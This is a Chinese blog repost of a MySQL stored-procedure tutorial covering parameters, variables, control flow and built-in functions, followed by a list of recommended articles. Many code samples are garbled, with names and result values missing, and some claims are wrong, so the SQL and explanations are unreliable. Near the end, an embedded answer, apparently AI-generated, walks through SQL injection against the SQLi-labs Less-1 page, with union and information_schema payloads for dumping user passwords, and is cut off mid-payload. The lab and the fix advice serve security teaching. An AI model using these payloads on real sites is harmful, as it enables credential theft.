MySQL存储过程详解  mysql …

最新推荐文章于 2021-11-26 22:54:14 发布
转载 最新推荐文章于 2021-11-26 22:54:14 发布 · 395 阅读 · 0

本文详细介绍了MySQL存储过程的概念、创建、调用等关键点,包括存储过程的参数类型、变量使用、注释规范以及控制语句等核心功能。重点讨论了如何利用存储过程提升数据库的处理速度和编程灵活性。
原文地址:MySQL存储过程详解  mysql 存储过程 作者:siyuantlw

mysql存储过程详解

1.      存储过程简介

 

我们常用的操作数据库语言SQL语句在执行的时候需要要先编译,然后执行,而存储过程(Stored Procedure)是一组为了完成特定功能的SQL语句集,经编译后存储在数据库中,用户通过指定存储过程的名字并给定参数(如果该存储过程带有参数)来调用执行它。

一个存储过程是一个可编程的函数,它在数据库中创建并保存。它可以有SQL语句和一些特殊的控制结构组成。当希望在不同的应用程序或平台上执行相同的函数,或者封装特定功能时,存储过程是非常有用的。数据库中的存储过程可以看做是对编程中面向对象方法的模拟。它允许控制数据的访问方式。

存储过程通常有以下优点:

(1).存储过程增强了SQL语言的功能和灵活性。存储过程可以用流控制语句编写,有很强的灵活性,可以完成复杂的判断和较复杂的运算。

(2).存储过程允许标准组件是编程。存储过程被创建后,可以在程序中被多次调用,而不必重新编写该存储过程的SQL语句。而且数据库专业人员可以随时对存储过程进行修改,对应用程序源代码毫无影响。

(3).存储过程能实现较快的执行速度。如果某一操作包含大量的Transaction-SQL代码或分别被多次执行,那么存储过程要比批处理的执行速度快很多。因为存储过程是预编译的。在首次运行一个存储过程时查询,优化器对其进行分析优化,并且给出最终被存储在系统表中的执行计划。而批处理的Transaction-SQL语句在每次运行时都要进行编译和优化,速度相对要慢一些。

(4).存储过程能过减少网络流量。针对同一个数据库对象的操作(如查询、修改),如果这一操作所涉及的Transaction-SQL语句被组织程存储过程,那么当在客户计算机上调用该存储过程时,网络中传送的只是该调用语句,从而大大增加了网络流量并降低了网络负载。

(5).存储过程可被作为一种安全机制来充分利用。系统管理员通过执行某一存储过程的权限进行限制,能够实现对相应的数据的访问权限的限制,避免了非授权用户对数据的访问,保证了数据的安全。

 

2.      关于MySQL的存储过程

存储过程是数据库存储的一个重要的功能,但是MySQL5.0以前并不支持存储过程,这使得MySQL在应用上大打折扣。好在MySQL 5.0终于开始已经支持存储过程,这样即可以大大提高数据库的处理速度,同时也可以提高数据库编程的灵活性。

3.      MySQL存储过程的创建

 

(1). 格式

MySQL存储过程创建的格式:CREATE PROCEDURE 过程名 ([过程参数[,...]])
[特性 ...] 过程体

这里先举个例子:
   

  1. mysql> DELIMITER //  
  2. mysql> CREATE PROCEDURE proc1(OUT int)  
  3.     -> BEGIN 
  4.     -> SELECT COUNT(*) INTO FROM user;  
  5.     -> END 
  6.     -> //  
  7. mysql> DELIMITER 
 
注:

1)这里需要注意的是DELIMITER //DELIMITER ;两句,DELIMITER是分割符的意思,因为MySQL默认以";"为分隔符,如果我们没有声明分割符,那么编译器会把存储过程当成SQL语句进行处理,则存储过程的编译过程会报错,所以要事先用DELIMITER关键字申明当前段分隔符,这样MySQL才会将";"当做存储过程中的代码,不会执行这些代码,用完了之后要把分隔符还原。

2)存储过程根据需要可能会有输入、输出、输入输出参数,这里有一个输出参数s,类型是int型,如果有多个参数用","分割开。

3)过程体的开始与结束使用BEGINEND进行标识。

这样,我们的一个MySQL存储过程就完成了,是不是很容易呢?看不懂也没关系,接下来,我们详细的讲解。

 

(2). 声明分割符

 

其实,关于声明分割符,上面的注解已经写得很清楚,不需要多说,只是稍微要注意一点的是:如果是用MySQLAdministrator管理工具时,可以直接创建,不再需要声明。

 

(3). 参数

MySQL存储过程的参数用在存储过程的定义,共有三种参数类型,IN,OUT,INOUT,形式如:

CREATE PROCEDURE([[IN |OUT |INOUT ] 参数名 数据类形...])

IN 输入参数:表示该参数的值必须在调用存储过程时指定,在存储过程中修改该参数的值不能被返回,为默认值

OUT 输出参数:该值可在存储过程内部被改变,并可返回

INOUT 输入输出参数:调用时指定,并且可被改变和返回

. IN参数例子

创建:

  1. mysql DELIMITER //  
  2. mysql CREATE PROCEDURE demo_in_parameter(IN p_in int)  
  3. -> BEGIN   
  4. -> SELECT p_in;   
  5. -> SET p_in=2;   
  6. -> SELECT p_in;   
  7. -> END;   
  8. -> //  
  9. mysql DELIMITER 


执行结果:

  1. mysql SET @p_in=1;  
  2. mysql CALL demo_in_parameter(@p_in);  
  3. +------+  
  4. p_in |  
  5. +------+  
  6.      
  7. +------+  
  8.  
  9. +------+  
  10. p_in |  
  11. +------+  
  12.      
  13. +------+  
  14.  
  15. mysql> SELECT @p_in;  
  16. +-------+  
  17. @p_in |  
  18. +-------+  
  19.     |  
  20. +-------+  


以上可以看出,p_in虽然在存储过程中被修改,但并不影响@p_id的值

 

.OUT参数例子

创建:

  1. mysql DELIMITER //  
  2. mysql CREATE PROCEDURE demo_out_parameter(OUT p_out int)  
  3. -> BEGIN 
  4. -> SELECT p_out;  
  5. -> SET p_out=2;  
  6. -> SELECT p_out;  
  7. -> END;  
  8. -> //  
  9. mysql DELIMITER 


执行结果:

  1. mysql SET @p_out=1;  
  2. mysql CALL sp_demo_out_parameter(@p_out);  
  3. +-------+  
  4. p_out   
  5. +-------+  
  6. NULL    
  7. +-------+  
  8.  
  9. +-------+  
  10. p_out |  
  11. +-------+  
  12.       
  13. +-------+  
  14.  
  15. mysql> SELECT @p_out;  
  16. +-------+  
  17. p_out |  
  18. +-------+  
  19.     |  
  20. +-------+  


. INOUT参数例子

创建:

  1. mysql DELIMITER //   
  2. mysql CREATE PROCEDURE demo_inout_parameter(INOUT p_inout int)   
  3. -> BEGIN 
  4. -> SELECT p_inout;  
  5. -> SET p_inout=2;  
  6. -> SELECT p_inout;   
  7. -> END;  
  8. -> //   
  9. mysql DELIMITER 

 

 

执行结果 :
  1. mysql SET @p_inout=1;  
  2. mysql CALL demo_inout_parameter(@p_inout) ;  
  3. +---------+  
  4. p_inout |  
  5. +---------+  
  6.       |  
  7. +---------+  
  8.  
  9. +---------+  
  10. p_inout   
  11. +---------+  
  12.       |  
  13. +---------+  
  14.  
  15. mysql SELECT @p_inout;  
  16. +----------+  
  17. @p_inout   
  18. +----------+  
  19.        |  
  20. +----------+ 

(4). 变量

. 变量定义

DECLARE variable_name [,variable_name...] datatype [DEFAULT value];

其中,datatypeMySQL的数据类型,如:int, float, date, varchar(length)

例如:

  1. DECLARE l_int int unsigned default 4000000;  
  2. DECLARE l_numeric number(8,2) DEFAULT 9.95;  
  3. DECLARE l_date date DEFAULT '1999-12-31';  
  4. DECLARE l_datetime datetime DEFAULT '1999-12-31 23:59:59';  
  5. DECLARE l_varchar varchar(255) DEFAULT 'This will not be padded';   

 

 

. 变量赋值

 SET 变量名 = 表达式值 [,variable_name = expression ...]

 

. 用户变量

 

. MySQL客户端使用用户变量

  1. mysql SELECT 'Hello World' into @x;  
  2. mysql SELECT @x;  
  3. +-------------+  
  4.   @x        |  
  5. +-------------+  
  6. Hello World |  
  7. +-------------+  
  8. mysql SET @y='Goodbye Cruel World';  
  9. mysql SELECT @y;  
  10. +---------------------+  
  11.     @y              |  
  12. +---------------------+  
  13. Goodbye Cruel World |  
  14. +---------------------+  
  15.  
  16. mysql SET @z=1+2+3;  
  17. mysql SELECT @z;  
  18. +------+  
  19. @z   |  
  20. +------+  
  21.    |  
  22. +------+  

ⅱ. 在存储过程中使用用户变量

  1. mysql CREATE PROCEDURE GreetWorld( SELECT CONCAT(@greeting,' World');  
  2. mysql SET @greeting='Hello';  
  3. mysql CALL GreetWorld( );  
  4. +----------------------------+  
  5. CONCAT(@greeting,' World') |  
  6. +----------------------------+  
  7.  Hello World               |  
  8. +----------------------------+  

 

. 在存储过程间传递全局范围的用户变量
  1. mysql> CREATE PROCEDURE p1()   SET @last_procedure='p1';  
  2. mysql> CREATE PROCEDURE p2() SELECT CONCAT('Last procedure was ',@last_proc);  
  3. mysql> CALL p1( );  
  4. mysql> CALL p2( );  
  5. +-----------------------------------------------+  
  6. CONCAT('Last procedure was ',@last_proc  |  
  7. +-----------------------------------------------+  
  8. Last procedure was p1                         |  
  9. +-----------------------------------------------+  

 

 

注意:

用户变量名一般以@开头

滥用用户变量会导致程序难以理解及管理

 

(5). 注释

 

MySQL存储过程可使用两种风格的注释

双模杠:--

该风格一般用于单行注释

c风格: 一般用于多行注释

例如:

 

  1. mysql DELIMITER //  
  2. mysql CREATE PROCEDURE proc1 --name存储过程名  
  3. -> (IN parameter1 INTEGER)   
  4. -> BEGIN   
  5. -> DECLARE variable1 CHAR(10);   
  6. -> IF parameter1 17 THEN   
  7. -> SET variable1 'birds';   
  8. -> ELSE 
  9. -> SET variable1 'beasts';   
  10. -> END IF;   
  11. -> INSERT INTO table1 VALUES (variable1);  
  12. -> END   
  13. -> //  
  14. mysql DELIMITER ;  

 

4.      MySQL存储过程的调用

call和你过程名以及一个括号,括号里面根据需要,加入参数,参数包括输入参数、输出参数、输入输出参数。具体的调用方法可以参看上面的例子。

5.      MySQL存储过程的查询

我们像知道一个数据库下面有那些表,我们一般采用show tables;进行查看。那么我们要查看某个数据库下面的存储过程,是否也可以采用呢?答案是,我们可以查看某个数据库下面的存储过程,但是是令一钟方式。

我们可以用

select name from mysql.proc where db=’数据库名’;

或者

select routine_name from information_schema.routines where routine_schema='数据库名';

或者

show procedure status where db='数据库名';

进行查询。

如果我们想知道,某个存储过程的详细,那我们又该怎么做呢?是不是也可以像操作表一样用describe 表名进行查看呢?

答案是:我们可以查看存储过程的详细,但是需要用另一种方法:

SHOW CREATE PROCEDURE 数据库.存储过程名;

就可以查看当前存储过程的详细。

 

6.      MySQL存储过程的修改

ALTER PROCEDURE

更改用CREATE PROCEDURE 建立的预先指定的存储过程,其不会影响相关存储过程或存储功能。

 

7.      MySQL存储过程的删除

删除一个存储过程比较简单,和删除表一样:

DROP PROCEDURE

MySQL的表格中删除一个或多个存储过程。

 

8.      MySQL存储过程的控制语句

(1). 变量作用域

内部的变量在其作用域范围内享有更高的优先权,当执行到end。变量时,内部变量消失,此时已经在其作用域外,变量不再可见了,应为在存储
过程外再也不能找到这个申明的变量,但是你可以通过out参数或者将其值指派
给会话变量来保存其值。

 

 

  1. mysql DELIMITER //  
  2. mysql CREATE PROCEDURE proc3()  
  3.      -> begin 
  4.      -> declare x1 varchar(5) default 'outer';  
  5.      -> begin 
  6.      -> declare x1 varchar(5) default 'inner';  
  7.      -> select x1;  
  8.      -> end;  
  9.      -> select x1;  
  10.      -> end;  
  11.      -> //  
  12. mysql DELIMITER ;  

 

 (2). 条件语句

. if-then -else语句

 

 

 

  1. mysql DELIMITER //  
  2. mysql CREATE PROCEDURE proc2(IN parameter int)  
  3.      -> begin 
  4.      -> declare var int;  
  5.      -> set var=parameter+1;  
  6.      -> if var=0 then 
  7.      -> insert into values(17);  
  8.      -> end if;  
  9.      -> if parameter=0 then 
  10.      -> update set s1=s1+1;  
  11.      -> else 
  12.      -> update set s1=s1+2;  
  13.      -> end if;  
  14.      -> end;  
  15.      -> //  
  16. mysql DELIMITER ;  


. case语句:

  1. mysql DELIMITER //  
  2. mysql CREATE PROCEDURE proc3 (in parameter int)  
  3.      -> begin 
  4.      -> declare var int;  
  5.      -> set var=parameter+1;  
  6.      -> case var  
  7.      -> when then   
  8.      -> insert into values(17);  
  9.      -> when then   
  10.      -> insert into values(18);  
  11.      -> else   
  12.      -> insert into values(19);  
  13.      -> end case;  
  14.      -> end;  
  15.      -> //  
  16. mysql DELIMITER 

 

(3). 循环语句

. while ···· end while

  1. mysql DELIMITER //  
  2. mysql CREATE PROCEDURE proc4()  
  3.      -> begin 
  4.      -> declare var int;  
  5.      -> set var=0;  
  6.      -> while var<6 do  
  7.      -> insert into values(var);  
  8.      -> set var=var+1;  
  9.      -> end while;  
  10.      -> end;  
  11.      -> //  
  12. mysql DELIMITER 

 

 

. repeat···· end repeat

它在执行操作后检查结果,而while则是执行前进行检查。

  1. mysql DELIMITER //  
  2. mysql CREATE PROCEDURE proc5 ()  
  3.      -> begin   
  4.      -> declare int;  
  5.      -> set v=0;  
  6.      -> repeat  
  7.      -> insert into values(v);  
  8.      -> set v=v+1;  
  9.      -> until v>=5  
  10.      -> end repeat;  
  11.      -> end;  
  12.      -> //  
  13. mysql DELIMITER ;  

 


. loop ·····end loop:

loop循环不需要初始条件,这点和while 循环相似,同时和repeat循环一样不需要结束条件, leave语句的意义是离开循环。

  1. mysql DELIMITER //  
  2. mysql CREATE PROCEDURE proc6 ()  
  3.      -> begin 
  4.      -> declare int;  
  5.      -> set v=0;  
  6.      -> LOOP_LABLE:loop  
  7.      -> insert into values(v);  
  8.      -> set v=v+1;  
  9.      -> if >=5 then 
  10.      -> leave LOOP_LABLE;  
  11.      -> end if;  
  12.      -> end loop;  
  13.      -> end;  
  14.      -> //  
  15. mysql DELIMITER ;  

 

 

. LABLES 标号:

标号可以用在begin repeat while 或者loop 语句前,语句标号只能在合法的语句前面使用。可以跳出循环,使运行指令达到复合语句的最后一步。

 

(4). ITERATE迭代

. ITERATE:

通过引用复合语句的标号,来从新开始复合语句

  1. mysql DELIMITER //  
  2. mysql CREATE PROCEDURE proc10 ()  
  3.      -> begin 
  4.      -> declare int;  
  5.      -> set v=0;  
  6.      -> LOOP_LABLE:loop  
  7.      -> if v=3 then   
  8.      -> set v=v+1;  
  9.      -> ITERATE LOOP_LABLE;  
  10.      -> end if;  
  11.      -> insert into values(v);  
  12.      -> set v=v+1;  
  13.      -> if v>=5 then 
  14.      -> leave LOOP_LABLE;  
  15.      -> end if;  
  16.      -> end loop;  
  17.      -> end;  
  18.      -> //  
  19. mysql DELIMITER 

 

 

9.      MySQL存储过程的基本函数

 

(1).字符串类

CHARSET(str) //返回字串字符集
CONCAT (string2 [,... ]) //连接字串
INSTR (string ,substring ) //返回substring首次在string中出现的位置,不存在返回0
LCASE (string2 ) //转换成小写
LEFT (string2 ,length ) //string2中的左边起取length个字符
LENGTH (string ) //string长度
LOAD_FILE (file_name ) //从文件读取内容
LOCATE (substring , string [,start_position ] ) INSTR,但可指定开始位置
LPAD (string2 ,length ,pad ) //重复用pad加在string开头,直到字串长度为length
LTRIM (string2 ) //去除前端空格
REPEAT (string2 ,count ) //重复count
REPLACE (str ,search_str ,replace_str ) //str中用replace_str替换search_str
RPAD (string2 ,length ,pad) //str后用pad补充,直到长度为length
RTRIM (string2 ) //去除后端空格
STRCMP (string1 ,string2 ) //逐字符比较两字串大小,
SUBSTRING (str , position [,length ]) //strposition开始,length个字符,
注:mysql中处理字符串时,默认第一个字符下标为1,即参数position必须大于等于1 

 

  1. mysql> select substring('abcd',0,2);  
  2. +-----------------------+  
  3. substring('abcd',0,2) |  
  4. +-----------------------+  
  5.                       |  
  6. +-----------------------+  
  7. row in set (0.00 sec)  
  8.  
  9. mysql> select substring('abcd',1,2);  
  10. +-----------------------+  
  11. substring('abcd',1,2) |  
  12. +-----------------------+  
  13.     ab                |  
  14. +-----------------------+  
  15. row in set (0.02 sec)  

TRIM([[BOTH|LEADING|TRAILING] [padding] FROM]string2) //去除指定位置的指定字符
UCASE (string2 ) //转换成大写
RIGHT(string2,length) //string2最后length个字符
SPACE(count) //生成count个空格

(2).数学类

ABS (number2 ) //绝对值
BIN (decimal_number ) //十进制转二进制
CEILING (number2 ) //向上取整
CONV(number2,from_base,to_base) //进制转换
FLOOR (number2 ) //向下取整
FORMAT (number,decimal_places ) //保留小数位数
HEX (DecimalNumber ) //转十六进制
注:HEX()中可传入字符串,则返回其ASC-11,如HEX('DEF')返回4142143
也可以传入十进制整数,返回其十六进制编码,如HEX(25)返回19
LEAST (number , number2 [,..]) //求最小值
MOD (numerator ,denominator ) //求余
POWER (number ,power ) //求指数
RAND([seed]) //随机数
ROUND (number [,decimals ]) //四舍五入,decimals为小数位数]

注:返回类型并非均为整数,如:
(1)默认变为整形值

  1. mysql> select round(1.23);  
  2. +-------------+  
  3. round(1.23) |  
  4. +-------------+  
  5.           |  
  6. +-------------+  
  7. row in set (0.00 sec)  
  8.  
  9. mysql> select round(1.56);  
  10. +-------------+  
  11. round(1.56) |  
  12. +-------------+  
  13.           |  
  14. +-------------+  
  15. row in set (0.00 sec) 



(2)可以设定小数位数,返回浮点型数据

  1. mysql> select round(1.567,2);  
  2. +----------------+  
  3. round(1.567,2) |  
  4. +----------------+  
  5.           1.57 |  
  6. +----------------+  
  7. row in set (0.00 sec) 

SIGN (number2 ) //

 

(3).日期时间类

ADDTIME (date2 ,time_interval ) // time_interval 加到 date2
CONVERT_TZ (datetime2 ,fromTZ ,toTZ ) // 转换时区
CURRENT_DATE ( ) // 当前日期
CURRENT_TIME ( ) // 当前时间
CURRENT_TIMESTAMP ( ) // 当前时间戳
DATE (datetime ) // 返回 datetime 的日期部分
DATE_ADD (date2 , INTERVAL d_value d_type ) // date2 中加上日期或时间
DATE_FORMAT (datetime ,FormatCodes ) // 使用 formatcodes 格式显示 datetime
DATE_SUB (date2 , INTERVAL d_value d_type ) // date2 上减去一个时间
DATEDIFF (date1 ,date2 ) // 两个日期差
DAY (date ) // 返回日期的天
DAYNAME (date ) // 英文星期
DAYOFWEEK (date ) // 星期 (1-7) ,1 为星期天
DAYOFYEAR (date ) // 一年中的第几天
EXTRACT (interval_name FROM date ) // date 中提取日期的指定部分
MAKEDATE (year ,day ) // 给出年及年中的第几天 , 生成日期串
MAKETIME (hour ,minute ,second ) // 生成时间串
MONTHNAME (date ) // 英文月份名
NOW ( ) // 当前时间
SEC_TO_TIME (seconds ) // 秒数转成时间
STR_TO_DATE (string ,format ) // 字串转成时间 , format 格式显示
TIMEDIFF (datetime1 ,datetime2 ) // 两个时间差
TIME_TO_SEC (time ) // 时间转秒数 ]
WEEK (date_time [,start_of_week ]) // 第几周
YEAR (datetime ) // 年份
DAYOFMONTH(datetime) // 月的第几天
HOUR(datetime) // 小时
LAST_DAY(date) //date 的月的最后日期
MICROSECOND(datetime) // 微秒
MONTH(datetime) //
MINUTE(datetime) // 返回符号 , 正负或 0
SQRT(number2) //开平方
【基于Java的图书管理系统----课程设计详解(使用MySQL数据库)附全部源代码下载链接、数据流图、流程图等】
追光者♂:记录、分享、总结、提升,现象级专栏《Python从入门到人工智能》作者,无惧黑暗,坚信曙光
12-11 1万+
(完整代码+实训报告): 链接: https://pan.baidu.com/s/1kogzA1G_lOstSQP6yo-cSw 提取码: yugt&nbsp; &nbsp; 觉着有用就点个赞哦~ &nbsp; 一,功能 管理员登录图书借阅信息管理图书信息管理管理员更改密码退出系统 二,工具 Eclipse Version: 2018-09 (4.9.0)MySQL Workbenc...
MySql&nbsp;存储过程
一览众山小
03-14 526
MySQL 存储过程是从 MySQL 5.0 开始增加的新功能。存储过程的优点有一箩筐。不过最主要的还是执行效率和SQL 代码封装。特别是 SQL 代码封装功能,如果没有存储过程,在外部程序访问数据库时(例如 PHP),要组织很多 SQL 语句。特别是业务逻辑复杂的时候,一大堆的 SQL 和条件夹杂在 PHP 代码中,让人不寒而栗。现在有了 MySQL 存储过程,业务逻辑可以封装存储过程中,这样不
不分享不是好汉,html的特殊字符存入数据库的时候查询出来转义了。比如说数据库存的是&quot;你好&quot; 但是读取出来后变成了"你好"
qq_28929589的博客
07-04 4415
比如说数据库存的是&amp;quot;你好&amp;quot;     但是读取出来后变成了"你好"/// 插入SQL时替换字符public static string Encode(string str)        {             str = str.Replace("'", "''");             str = str.Replace("\"", "&a
mysql小于符号的转译_mybatis ![CDATA[ ]] 使用,小于大于号转义 和小于号大于号使用...
weixin_34746715的博客
01-20 350
CDATA在今天使用Mybatis的xml文件中写sql语句时写入了一些特殊字符 如 < &gt; & 等,但解析xml文件的时候会被转义,事实上并不希望它被转义,可以使用. 这是XML语法,在CDATA内部的所有内容都会被解析器忽略. 但是因此会导致 等标签本身功能失效,所以使用时把带有特殊字符的语句或字符本身放在内即可,即尽量精确其作用范围.代码如下:select (CASE...
保存数据到数据库出现乱码问题
a1648988492的博客
11-21 967
在配置数据库时,记得加上编码格式 最后面加上 characterEncoding=UTF-8
MySQL&nbsp;常用命令详解
colin_yu的博客
09-08 588
Mysql安装目录   数据库目录   /var/lib/mysql/   配置文件   /usr/share/mysqlmysql.server命令及配置文件)   相关命令   /usr/bin(mysqladmin mysqldump等命令)   启动脚本   /etc/init.d/mysql(启动脚本文件mysql的目录)      系统管理   连接MySQL   格式: mysql
mysql模式匹配详解_mysql模式匹配
weixin_34137550的博客
02-08 349
MySQL提供标准的SQL模式匹配,以及一种基于象Unix实用程序如vi、grep和sed的扩展正则表达式模式匹配的格式。 SQL模式匹配允许你使用“_”匹配任何单个字符,而“%”匹配任意数目字符(包括零字符)。在 MySQL中,SQL的模式默认是忽略大小写的。下面给出一些例子。注意使用SQL模式时,不能使用 =或!=;而应使用LIKE或NOT LIKE比较操作符。 要想找出以“b”开...
MySQL常用操作之创建存储过程语法详解
CharlesYan的博客
07-07 5234
MySQL创建存过经典总结,没有之一
MySQL详解之索引
weixin_43433032的博客
12-06 452
一、索引概述 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;索引与书的目录非常相似,由数据表中一列或者多列组合而成,创建索引的目的是为了优化数据库查询速度, 索引是提高性能最常用的工具。其中,用户创建的索引指向数据库中具体数据所在位置。当用户通过索引查询数据库中的数据时,不需要遍历所有数据库中的所有数据,从而提高查询效率。所有的MySQL的列类型都...
第讲学习制作PHPMYSQL留言板2优秀文档.ppt
11-14
制作PHP+MYSQL留言板的过程中,这些技术共同作用于用户交互、数据验证、数据存储和用户认证等多个环节,确保了系统的正常运行和用户的安全。通过这样的学习,开发者能够构建一个基本的、功能完整的留言板系统,理解...
如何使用 Workbench 远程连接到 MySQL 数据库 -MySQL Workbench 使用教程
热门推荐
蒋川@卡拉云
11-26 1万+
MySQL Workbench 是一款专门为 MySQL 设计的可视化数据库 GUI 管理工具,我们可以在自己的计算机上,使用图形化界面(GUI)远程管理 MySQL 数据库。 有关 MySQL 远程管理软件,你可以选择 Windows 下的&nbsp;HeidiSQL,MacOS 下的&nbsp;Sequel Ace&nbsp;或者 MySQL 官方推出的跨平台客户端&nbsp;MySQL Workbench&nbsp;。如果你需要针对自己的工作流对数据库操作,定制开发,推荐一下卡拉云,详情见文末。 本.
ORACLE&nbsp;如何查看存储过程的定义
wxwpxh的专栏
01-17 557
相关的数据字典   USER_SOURCE 用户的存储过程、函数的源代码字典   DBA_SOURCE 整个系统所有用户的存储过程、函数的源代码字典   ALL_SOURCE 当前用户能使用的存储过程(包括其她用户授权)、函数的源代码字典   USER_ERRORS 用户的存储过程、函数的源代码存在错误的信息字典   SQL> select * from user_sou
MySQL&nbsp;条件判断函数
valexchao的博客
04-14 423
IF(EXPR, V1, V2)  如果EXPR成立, 返回V1, 否则V2 IFNULL(V1,V2)   如果V1不为NULL, 返回V1, 否则V2 CASE WHEN exp1 THEN v1 [WHEN exp2 THEN v2][ELSE vn] END CASE 表示函数开始, END表示结束 如果exp1成立,返回v1. 如果exp2成立,返回v2. 其他, 返回vn。 ---
mysql&nbsp;存储引擎&nbsp;&nbsp;和&nbsp;事务
悟鸣的技术博客
06-20 653
存储引擎 最常见的是:Myisam和 innoDB 存储引擎  和 事务" TITLE="mysql 存储引擎  和 事务" /> 数据库的engine显示 存储引擎  和 事务" TITLE="mysql 存储引擎  和 事务" /> MyISAM ,批量插入速度快,不支持事务,锁表 InnoDB 批量插入相对较慢,支持事务,锁行  -----------官方文档---------beg
(Kriging-NSGA2)克里金模型结合多目标遗传算法求最优因变量及对应的最佳自变量组合研究(Matlab代码实现)
最新发布
12-17
(Kriging_NSGA2)克里金模型结合多目标遗传算法求最优因变量及对应的最佳自变量组合研究(Matlab代码实现)内容概要:本文介绍了克里金模型(Kriging)与多目标遗传算法NSGA-II相结合的方法,用于求解最优因变量及其对应的最佳自变量组合,并提供了完整的Matlab代码实现。该方法首先利用克里金模型构建高精度的代理模型,逼近复杂的非线性系统响应,减少计算成本;随后结合NSGA-II算法进行多目标优化,搜索帕累托前沿解集,从而获得多个最优折衷方案。文中详细阐述了代理模型构建、算法集成流程及参数设置,适用于工程设计、参数反演等复杂优化问题。此外,文档还展示了该方法在SCI一区论文中的复现应用,体现了其科学性与实用性。; 适合人群:具备一定Matlab编程基础,熟悉优化算法和数值建模的研究生、科研人员及工程技术人员,尤其适合从事仿真优化、实验设计、代理模型研究的相关领域工作者。; 使用场景及目标:①解决高计算成本的多目标优化问题,通过代理模型降低仿真次数;②在无法解析求导或函数高度非线性的情况下寻找最优变量组合;③复现SCI高水平论文中的优化方法,提升科研可信度与效率;④应用于工程设计、能源系统调度、智能制造等需参数优化的实际场景。; 阅读建议:建议读者结合提供的Matlab代码逐段理解算法实现过程,重点关注克里金模型的构建步骤与NSGA-II的集成方式,建议自行调整测试函数或实际案例验证算法性能,并配合YALMIP等工具包扩展优化求解能力。
FindAddress 读第三方程序的变量的原理
12-17
读第三方程序的变量的原理 2 https://flyfish.blog.youkuaiyun.com/article/details/155859130
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt; <html xmlns="http://www.w3.org/1999/xhtml"&gt; <head&gt; <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt; <title&gt;Less-1 **Error Based- String**</title&gt; </head&gt; <body bgcolor="#000000"&gt; <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center"&gt;Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"&gt; Dhakkan </font&gt;<br&gt; <font size="3" color="#FFFF00"&gt; <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'&gt;"; echo 'Your Login name:'. $row['username']; echo "<br&gt;"; echo 'Your Password:' .$row['password']; echo "</font&gt;"; } else { echo '<font color= "#FFFF00"&gt;'; print_r(mysql_error()); echo "</font&gt;"; } } else { echo "Please input the ID as parameter with numeric value";} ?&gt; </font&gt; </div&gt;</br&gt;</br&gt;</br&gt;<center&gt; <img src="../images/Less-1.jpg" /&gt;</center&gt; </body&gt; </html&gt; 解释代码 提出如何sql注入
11-03
<think&gt;我们分析的是Less-1 Error Based- String的代码,这是一个典型的SQL注入漏洞示例。 代码关键点: 1. 从GET参数中获取id值:$id=$_GET['id']; 2. 将id直接拼接到SQL查询语句中:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 3. 执行查询并显示结果。 由于id参数没有经过任何过滤,而且被包含在单引号中,因此我们可以通过闭合单引号并注入额外的SQL代码来实现注入。 如何注入: 例如,正常请求:?id=1 构造注入:?id=1' union select 1,2,3 --+ 解释: 1. 首先闭合单引号:1' 2. 然后加入union查询,注意union查询的列数需要和原查询一致(这里原查询是3列,因为结果中显示了username和password,并且我们推测还有id列,所以共3列) 3. 使用--+注释掉后面的语句(包括原SQL语句中后面的单引号和LIMIT子句) 步骤详解: 原SQL语句:SELECT * FROM users WHERE id='$id' LIMIT 0,1 当$id为:1' union select 1,2,3 --+ 时,整个语句变成: SELECT * FROM users WHERE id='1' union select 1,2,3 -- ' LIMIT 0,1 -- 后面的内容被注释掉,所以实际执行的是: SELECT * FROM users WHERE id='1' union select 1,2,3 执行结果:如果第一个查询没有结果,则会返回我们union select的结果,即1,2,3。 在页面中,会显示Your Login name:2 和 Your Password:3(因为username在第二个位置,password在第三个位置,可以通过实际测试调整位置) 实际注入步骤: 1. 判断注入点:输入 ?id=1' 看是否报错,如果报错则说明存在注入漏洞。 2. 确定字段数:使用order by,如 ?id=1' order by 3 --+ (直到不报错,确定3个字段) 3. 找到回显位置:?id=1' union select 1,2,3 --+ 4. 查询数据库信息:?id=1' union select 1,version(),database() --+ 5. 查询表名:?id=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 6. 查询列名:?id=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 7. 查询数据:?id=1' union select 1,group_concat(username),group_concat(password) from users --+ 注意:实际注入时,可能需要处理一些限制,比如原查询返回了结果,我们可以使原查询不返回结果(例如id=-1)来确保union查询的结果显示出来。 代码修复建议: 避免SQL注入的最佳方法是使用参数化查询(预处理语句)。在PHP中,可以使用PDO或MySQLi扩展。 例如,使用MySQLi预处理: $stmt = $conn-&gt;prepare("SELECT * FROM users WHERE id=? LIMIT 0,1"); $stmt-&gt;bind_param("i", $id); $stmt-&gt;execute(); $result = $stmt-&gt;get_result(); $row = $result-&gt;fetch_assoc(); 或者,如果不得不使用字符串拼接,那么必须对输入进行转义(但仍然不建议,因为转义可能不可靠): $id = mysqli_real_escape_string($conn, $_GET['id']); 但最好的方式还是使用预处理。 下面我们用代码演示如何修复这个漏洞(使用MySQLi预处理): </think&gt;### SQL注入漏洞分析及利用方法 #### 漏洞分析: ```html <?php $id = $_GET['id']; // 未过滤的用户输入 $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1"; // 直接拼接SQL查询 $result = mysql_query($sql); // 执行查询 ?&gt; ``` 关键漏洞点: 1. 用户输入的`id`参数直接拼接到SQL语句中 2. 未使用任何过滤或参数化处理 3. 错误信息直接显示在页面上(`print_r(mysql_error())`) #### SQL注入步骤: 1. **探测漏洞**: `?id=1'` - 触发SQL错误(单引号未闭合) 2. **确定列数**: `?id=1' ORDER BY 3-- -` (通过递增数字直到报错确定列数为3) 3. **获取敏感信息**: ```sql ?id=-1' UNION SELECT 1, @@version, database()-- - 